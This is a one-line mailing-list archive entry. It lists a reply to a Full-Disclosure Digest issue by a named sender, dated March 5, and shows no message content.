- Re: Full-Disclosure Digest, Vol 13, Issue 8 DONNY MCCOY (Mar 05)